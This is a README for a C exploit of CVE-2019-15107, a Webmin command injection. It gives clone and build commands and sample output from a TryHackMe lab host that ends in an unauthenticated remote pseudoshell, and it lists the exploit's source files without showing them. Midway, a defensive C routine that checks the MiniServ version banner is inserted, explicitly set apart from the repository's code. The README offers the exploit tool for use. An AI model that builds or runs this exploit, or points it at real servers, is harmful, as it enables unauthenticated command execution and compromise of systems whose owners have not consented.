<h1 align="center">CVE-2019-15107 Webmin Exploit</h1>
<p align="center">
<a href="./LICENSE.md"><img src="https://img.shields.io/badge/License-GPL%20v2-blue.svg"></a>
<img src="https://img.shields.io/badge/Made%20With-C-green.svg">
</p>
<h2>CVE-2019-15107</h2>
<p>An issue was discovered in <b>Webmin <=1.920</b>. The parameter <code>old</code> in <code>password_change.cgi</code> contains a command injection vulnerability. <a href="https://nvd.nist.gov/vuln/detail/cve-2019-15107" target="_blank"> [NVD]</a></p>
## Compiling
```bash
$ git clone https://github.com/whokilleddb/CVE-2019-15107
$ cd CVE-2019-15107
$ make
```
## Example Usage
```bash
$ ./exploit http://thomaswreath.thm:10000
[+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
[+] Target URI: http://thomaswreath.thm:10000
======Headers======
HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Date: Sat, 14 Aug 2021 23:40:01 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close
[~] The Given Server Is Running In SSL MODE
[+] Switching To SSL
[+] The Given Server Might Be Vulnerable To CVE-2019-15107
[+] The Given Server IS VULNERABLE To CVE-2019-15107
[+] Starting Pseudoshell
[+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
[+] To Exit, type: exit()
```
_PS: This exploit was made while I was trying [TryHackMe's Wreath Network](https://tryhackme.com/room/wreath), hence the example shown here corresponds to the box._
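For triage from the defender's side, the `Server: MiniServ/...` banner seen in the example output can be compared against the affected range stated above (Webmin <=1.920). The following is an added example, not part of this repository's code; the function names and the padding of the minor version to three digits are assumptions, and a banner in range is an inventory hint to prioritise patching, not proof that a host is exploitable.

```c
/* Added example, not part of the exploit's source tree. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

enum banner_status { BANNER_UNKNOWN = -1, BANNER_NEWER = 0, BANNER_IN_RANGE = 1 };

/* Read up to max_digits decimal digits at *p; return the count, 0 on failure. */
static int read_digits(const char **p, int max_digits, int *out)
{
    int n = 0;
    *out = 0;
    while (isdigit((unsigned char)**p) && n < max_digits) {
        *out = *out * 10 + (*(*p)++ - '0');
        n++;
    }
    return isdigit((unsigned char)**p) ? 0 : n;   /* too many digits: reject */
}

/* Classify a raw HTTP header block by its "Server: MiniServ/<major>.<minor>" line.
 * Assumption: <minor> is a decimal fraction of up to three digits (1.89 == 1.890). */
int webmin_banner_status(const char *headers)
{
    const char *line = headers;
    while (line && *line) {
        if (*line == '\r' || *line == '\n') break;        /* end of headers */
        if (strncasecmp(line, "Server:", 7) == 0) {
            const char *v = line + 7;
            int major, minor, n;
            while (*v == ' ' || *v == '\t') v++;
            if (strncmp(v, "MiniServ/", 9) != 0) return BANNER_UNKNOWN;
            v += 9;
            if (!read_digits(&v, 4, &major) || *v++ != '.') return BANNER_UNKNOWN;
            if (!(n = read_digits(&v, 3, &minor))) return BANNER_UNKNOWN;
            while (n++ < 3) minor *= 10;                  /* pad "89" to 890 */
            return (major < 1 || (major == 1 && minor <= 920))
                       ? BANNER_IN_RANGE : BANNER_NEWER;
        }
        line = strchr(line, '\n');
        if (line) line++;
    }
    return BANNER_UNKNOWN;
}

int main(void)
{
    /* Header lines taken from the example output above. */
    const char *sample = "HTTP/1.0 200 Document follows\r\n"
                         "Server: MiniServ/1.890\r\nConnection: close\r\n\r\n";
    printf("status=%d\n", webmin_banner_status(sample));
    return 0;
}
```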
## F.A.Q
Q : **Why C instead of Python3?**
A : **Because I Am A Psychopath**
```
[4.0K] /data/pocs/95de1a1acba7911aa793b7e599016b9fb0601be0
├── [ 18K] LICENSE.GPL2
├── [ 463] Makefile
├── [1.5K] README.md
└── [4.0K] src
    ├── [4.0K] globals
    │   ├── [ 351] structs.h
    │   └── [ 238] variables.h
    ├── [4.0K] headers
    │   ├── [4.9K] CURL.h
    │   └── [3.0K] modules.h
    └── [4.0K] main
        └── [1.9K] main.c

4 directories, 8 files
```